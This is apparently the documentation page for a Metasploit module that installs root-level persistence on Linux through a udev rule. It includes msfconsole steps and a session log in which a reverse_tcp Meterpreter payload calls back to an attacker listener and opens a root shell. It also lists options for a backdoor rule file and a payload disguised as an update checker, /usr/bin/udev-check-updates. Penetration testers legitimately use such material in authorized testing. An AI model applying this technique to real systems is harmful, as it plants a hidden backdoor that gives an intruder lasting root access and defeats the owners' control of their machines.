cgranleese-r7
44 lines
1.4 KiB
Markdown
44 lines
1.4 KiB
Markdown
This is a post module that performs a persistence installation on a Linux system using [udev](https://en.wikipedia.org/wiki/Udev).
|
|
The persistence execution with be triggered with root privileges everytime a network interface other than l0 comes up.
|
|
|
|
## Verification Steps
|
|
|
|
1. Start msfconsole
|
|
2. Obtain a session on the target machine
|
|
3. `use exploit/linux/local/udev_persistence`
|
|
4. `set session -1`
|
|
5. `exploit`
|
|
|
|
## Module usage
|
|
|
|
```
|
|
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/udev_persistence
|
|
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
|
|
msf exploit(linux/local/udev_persistence) > set session -1
|
|
session => -1
|
|
msf exploit(linux/local/udev_persistence) > exploit
|
|
|
|
[*] /usr/bin/udev-check-updates written
|
|
[*] /lib/udev/rules.d/99-update.rules written
|
|
msf exploit(linux/local/udev_persistence) >
|
|
[*] Sending stage (3045380 bytes) to 172.18.49.39
|
|
[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400
|
|
msf exploit(linux/local/udev_persistence) > sessions -i -1
|
|
[*] Starting interaction with 2...
|
|
|
|
meterpreter > getuid
|
|
Server username: root
|
|
meterpreter >
|
|
```
|
|
|
|
## Options
|
|
|
|
### BACKDOOR_PATH
|
|
|
|
Specify the path of the file containing the udev rules. (Default: /lib/udev/rules.d/99-update.rules)
|
|
|
|
### PAYLOAD_PATH
|
|
|
|
Specify the name of the payload to execute upon persistence. (Default: /usr/bin/udev-check-updates)
|
|
|